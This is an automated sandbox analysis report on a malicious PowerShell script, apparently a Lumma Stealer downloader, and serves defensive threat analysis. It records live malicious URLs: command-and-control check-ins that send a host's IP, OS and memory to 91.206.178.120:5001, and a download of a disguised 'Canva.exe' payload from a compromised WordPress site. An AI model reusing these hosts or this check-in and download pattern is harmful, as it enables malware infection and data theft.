
Windows Analysis Report
Pmw24ExIdx.ps1

Overview

General Information

Sample name: Pmw24ExIdx.ps1 (renamed because the original name is a hash value)
Original sample name: 6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875.ps1
Analysis ID: 1617745
MD5: 9d4b0d4215aba4d887790a8a959eb119
SHA1: 7a2607ff3d039b73a913381daf2df94c58e67a61
SHA256: 6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875
Tags: 91-206-178-120, ps1, user-JAMESWT_MHT

Detection

Score: 76
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 7236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 7424 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\Pmw24ExIdx.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5808, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", ProcessId: 7236, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5808, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1", ProcessId: 7236, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-18T08:26:01.893635+0100 | 2021697 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 185.211.7.193 | 443 | TCP
2025-02-18T08:26:03.061005+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49705 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:26:00.782059+0100 | 2860232 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49700 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:26:00.782066+0100 | 2860233 | 1 | Malware Command and Control Activity Detected | 91.206.178.120 | 5001 | 192.168.2.7 | 49700 | TCP
2025-02-18T08:25:58.366209+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49699 | 104.26.12.205 | 80 | TCP
2025-02-18T08:26:00.782059+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49700 | 91.206.178.120 | 5001 | TCP
2025-02-18T08:26:01.893635+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49701 | 185.211.7.193 | 443 | TCP
2025-02-18T08:26:03.061005+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49705 | 91.206.178.120 | 5001 | TCP

AV Detection

Source: http://91.206.178.120:5001/script_end?random_number= | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=$randomNumber | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=66350$M | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=66350 | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | Avira URL Cloud: Label: malware
Source: https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exe | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip= | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001 | Avira URL Cloud: Label: malware
Source: https://goutteuy.com/wp-content/p | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350 | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | Avira URL Cloud: Label: malware
Source: Pmw24ExIdx.ps1 | Virustotal: Detection: 14%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.5% probability
Source: unknown | HTTPS traffic detected: 185.211.7.193:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb | source: powershell.exe, 00000000.00000002.1353705363.0000000008830000.00000004.00000020.00020000.00000000.sdmp

Networking

Source: Network traffic | Suricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.7:49700 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.7:49700
Source: Network traffic | Suricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.7:49701 -> 185.211.7.193:443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49705
Source: global traffic | TCP traffic: 192.168.2.7:49700 -> 91.206.178.120:5001
Source: global traffic | TCP traffic: 192.168.2.7:57642 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 104.18.11.207
Source: Joe Sandbox View | IP Address: 104.26.12.205
Source: Joe Sandbox View | ASN Name: QUICKPACKETUS
Source: Joe Sandbox View | ASN Name: ARTNET2PL
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: api.ipify.org
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49699 -> 104.26.12.205:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49700 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49705 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49705 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.7:49701 -> 185.211.7.193:443
Source: global traffic | HTTP traffic detected: GET /wp-content/plugins/header-footer/images/Canva.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: goutteuy.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1 | Accept: */* | Accept-Language: en-CH | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: maxcdn.bootstrapcdn.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=66350 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 91.206.178.120:5001 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /script_end?random_number=66350 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 91.206.178.120:5001
Source: unknown | TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: goutteuy.com
Source: global traffic | DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic | DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | content-type: text/html | last-modified: Fri, 07 Jan 2022 09:51:35 GMT | etag: "999-61d80d27-4ab5739bf7ac3281;;;" | accept-ranges: bytes | content-length: 2457 | date: Tue, 18 Feb 2025 07:26:01 GMT | server: LiteSpeed | content-security-policy: upgrade-insecure-requests | platform: hostinger | panel: hpanel | alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1 | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
Source: powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=66350
Source: powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=66350$M
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501141841.000000FCA7A99000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1 | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
Source: powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
Source: powershell.exe, 00000000.00000002.1346667806.000000000563E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501141841.000000FCA7A99000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1 | String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1346667806.0000000005401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1346667806.0000000005401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/c
Source: powershell.exe, 00000000.00000002.1345826883.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1346667806.0000000005C05000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1346667806.0000000005697000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://goutteuy.com
Source: powershell.exe, 00000000.00000002.1346667806.00000000057B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://goutteuy.com/wp-content/p
Source: powershell.exe, 00000000.00000002.1346667806.0000000005556000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.2501344002.0000020D591B5000.00000004.00000020.00020000.00000000.sdmp, Pmw24ExIdx.ps1 | String found in binary or memory: https://goutteuy.com/wp-content/plugins/header-footer/images/Canva.exe
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/)
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css.
Source: powershell.exe, 00000000.00000002.1349234959.000000000646B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/?%
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1346667806.00000000056AD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: powershell.exe, 00000000.00000002.1354498609.000000000895B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js1
Source: powershell.exe, 00000000.00000002.1354498609.000000000895B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.jsC
Source: powershell.exe, 00000000.00000002.1354498609.000000000895B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.jsh
Source: powershell.exe, 00000000.00000002.1354012806.000000000890D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js~
Source: powershell.exe, 00000000.00000002.1354012806.00000000088B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/c%Q
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0530E4D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0A337990
Source: classification engine | Classification label: mal76.troj.winPS1@3/7@4/4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbtwnioc.hez.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\Pmw24ExIdx.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\Pmw24ExIdx.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: jscript9.dll
